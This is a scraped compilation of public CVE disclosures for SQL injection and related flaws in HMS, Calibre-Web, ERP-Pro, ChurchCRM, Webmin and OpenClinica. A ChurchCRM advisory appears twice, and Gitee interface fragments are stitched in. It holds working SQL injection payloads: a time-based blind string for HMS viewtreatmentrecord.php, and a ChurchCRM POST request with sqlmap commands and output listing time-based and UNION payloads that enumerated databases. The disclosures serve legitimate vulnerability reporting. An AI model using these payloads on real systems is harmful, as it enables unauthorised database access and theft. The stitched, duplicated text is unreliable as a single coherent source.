In the POST request of the appointment.php page of HMS v.0, there are SQL injection vulnerabilities in multiple parameters, and database information can be obtained through injection.

       

This is a Startup Project. May contain Bugs.

**INSTALLATION**

1.  Download and Unzip files To Localhost Folder.
2.  Import Database.

Run Project Through Xampp and Browser.

**Demo**

https://kabir.infantinventory.com/hms

CVE-2022-30012: GitHub - kabirkhyrul/hms at 1.0

Calibre-Web before 0.6.18 allows user table SQL Injection.

**Security Policy****Reporting a Vulnerability**

Please report security issues to ozzie.fernandez.isaacs@googlemail.com

**Supported Versions**

To receive fixes for security vulnerabilities it is required to always upgrade to the latest version of Calibre-Web. See https://github.com/janeczku/calibre-web/releases/latest for the latest release.

**History**

Fixed in

Description

CVE number

3rd July 2018

Guest access acts as a backdoor

V 0.6.7

Hardcoded secret key for sessions

CVE-2020-12627

V 0.6.13

Calibre-Web Metadata cross site scripting

CVE-2021-25964

V 0.6.13

Name of Shelves are only visible to users who can access the corresponding shelf Thanks to @ibarrionuevo

V 0.6.13

JavaScript could get executed in the description field. Thanks to @ranjit-git and Hagai Wechsler (WhiteSource)

V 0.6.13

JavaScript could get executed in a custom column of type "comment" field

V 0.6.13

JavaScript could get executed after converting a book to another format with a title containing javascript code

V 0.6.13

JavaScript could get executed after converting a book to another format with a username containing javascript code

V 0.6.13

JavaScript could get executed in the description series, categories or publishers title

V 0.6.13

JavaScript could get executed in the shelf title

V 0.6.13

Login with the old session cookie after logout. Thanks to @ibarrionuevo

V 0.6.14

CSRF was possible. Thanks to @mik317 and Hagai Wechsler (WhiteSource)

CVE-2021-25965

V 0.6.14

Migrated some routes to POST-requests (CSRF protection). Thanks to @scara31

CVE-2021-4164

V 0.6.15

Fix for "javascript:" script links in identifier. Thanks to @scara31

CVE-2021-4170

V 0.6.15

Cross-Site Scripting vulnerability on uploaded cover file names. Thanks to @ibarrionuevo

V 0.6.15

Creating public shelfs is now denied if user is missing the edit public shelf right. Thanks to @ibarrionuevo

V 0.6.15

Changed error message in case of trying to delete a shelf unauthorized. Thanks to @ibarrionuevo

V 0.6.16

JavaScript could get executed on authors page. Thanks to @alicaz

CVE-2022-0352

V 0.6.16

Localhost can no longer be used to upload covers. Thanks to @scara31

CVE-2022-0339

V 0.6.16

Another case where public shelfs could be created without permission is prevented. Thanks to @nhiephon

CVE-2022-0273

V 0.6.16

It's prevented to get the name of a private shelfs. Thanks to @nhiephon

CVE-2022-0405

V 0.6.17

The SSRF Protection can no longer be bypassed via an HTTP redirect. Thanks to @416e6e61

CVE-2022-0767

V 0.6.17

The SSRF Protection can no longer be bypassed via 0.0.0.0 and it's ipv6 equivalent. Thanks to @r0hanSH

CVE-2022-0766

V 0.6.18

Possible SQL Injection is prevented in user table Thanks to Iman Sharafaldin (Forward Security)

CVE-2022-30765

V 0.6.18

The SSRF protection no longer can be bypassed by IPV6/IPV4 embedding. Thanks to @416e6e61

CVE-2022-0939

V 0.6.18

The SSRF protection no longer can be bypassed to connect to other servers in the local network. Thanks to @michaellrowley

CVE-2022-0990

**Statement regarding Log4j (CVE-2021-44228 and related)**

Calibre-web is not affected by bugs related to Log4j. Calibre-Web is a python program, therefore not using Java, and not using the Java logging feature log4j.

CVE-2022-30765: calibre-web/SECURITY.md at master · janeczku/calibre-web

ERP-Pro v3.7.5 was discovered to contain a SQL injection vulnerability via the component /base/SysEveMenuAuthPointMapper.xml..

**SQL injection vulnerability exists in ERP-Pro system**

待办的

lan

创建于  

2022-04-05 17:36

Mapper.xml question code  
  
serviceimpl question code  
  
controoler question code  
  
The system has only one Session Filter  
filterconfig code  
  
interceptor config  
  
There are no filtered SQL statements in the interceptor code

interceptor code  

**评论 (0)**

lan 创建了**任务**

登录 后才可以发表评论

状态

待办的

待办的

进行中

已完成

已拒绝

负责人

未设置

标签

未设置

标签管理

里程碑

未关联

未关联

Pull Requests

未关联

未关联

关联的 Pull Requests 被合并后可能会关闭此 issue

分支

未关联

分支 (1)

标签 (1)

master

2.0.0

开始日期   -   截止日期

\-

置顶选项

不置顶

置顶等级：高

置顶等级：中

置顶等级：低

优先级

不指定

严重

主要

次要

不重要

参与者（1）

CVE-2022-28930: SQL injection vulnerability exists in ERP-Pro system · Issue #I515R4 · Skyeye云系列/erp-pro - Gitee.com

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the delid parameter at viewtreatmentrecord.php.

**DATE : 4/6/22****Web App : https://github.com/kabirkhyrul/HMS****Version : 1.0****Researcher : cyber\_homeless****Path : viewtreatmentrecord.php?delid=1****Security issue : SQLInjection**

While installing the web app i saw bunch of sql connection's so i went for SQLInjection and soon enough found one : 

Exploiting this vulnerability is pretty easy now using sqlmap: 

Payload : 1' AND (SELECT 6895 FROM (SELECT(SLEEP(5)))juDk) AND 'GPzW'='GPzW

CVE-2022-28929: vulnerabilitys/HMS at main · cyberhomeless/vulnerabilitys

A SQL injection vulnerability exists in ChurchCRM version 2.0.0 to 4.4.5 that allows an authenticated attacker to issue an arbitrary SQL command to the database through the unsanitized EN_tyid, theID and EID fields used when an Edit action on an existing record is being performed.

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

CVE-2021-41965: SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

OpenClinica is an open source software for Electronic Data Capture (EDC) and Clinical Data Management (CDM). Versions prior to 3.16.1 are vulnerable to SQL injection due to the use of string concatenation to create SQL queries instead of prepared statements. No known workarounds exist. This issue has been patched in 3.16.1, 3.15.9, 3.14.1, and 3.13.1 and users are advised to upgrade.

**Package**

OpenClinica (None)

**Patched versions**

3.13.1, 3.14.1, 3.16.2

**Impact**

SQL Injection.

The following locations are vulnerable to SQL injection due to the use of string concatenation to create SQL queries instead of prepared statements.

These vulnerabilities were uncovered and reported by a CodeQL Query from LGTM.com. The below query shows the specific dataflow paths and string concatenations creating the conditions for this vulnerability to exist.

https://lgtm.com/projects/g/OpenClinica/OpenClinica/alerts/?mode=list&tag=security&id=java%2Fsql-injection

A summary of the vulnerabilities can be found below:

*   ps = con.prepareStatement(query);
    
    *   Vulnerable parameters: formVersionOID; Endpoints:
        *   /rest/auth/api/v1/clinicaldata/json/view/{studyOID}/{studySubjectIdentifier}/{studyEventOID}/{formVersionOID}
        *   /rest/clinicaldata/json/view/{studyOID}/{studySubjectIdentifier}/{studyEventOID}/{formVersionOID}
        *   /rest/clinicaldata/xml/view/{studyOID}/{studySubjectIdentifier}/{studyEventOID}/{formVersionOID}
        *   /rest/metadata/xml/view/{studyOID}/{studyEventDefinitionOId}/{formVersionOID}
        *   /rest/metadata/json/view/{studyOID}/{studyEventDefinitionOId}/{formVersionOID}
*   Vulnerable POST parameters for endpoint: rest/auth/api/itemdata: ssOid, sedOid, eventOrdinal, crfOid in the following locations:
    
    *   org.hibernate.Query q = getCurrentSession().createQuery(query);
        
    *   org.hibernate.Query q = getCurrentSession().createQuery(query);
        
    *   org.hibernate.Query q = getCurrentSession().createQuery(query);
        

**Patches**

b152cc6

**Workarounds**

_Is there a way for users to fix or remediate the vulnerability without upgrading?_  
No

**References**

*   https://owasp.org/www-community/attacks/SQL\_Injection

Tag

#sql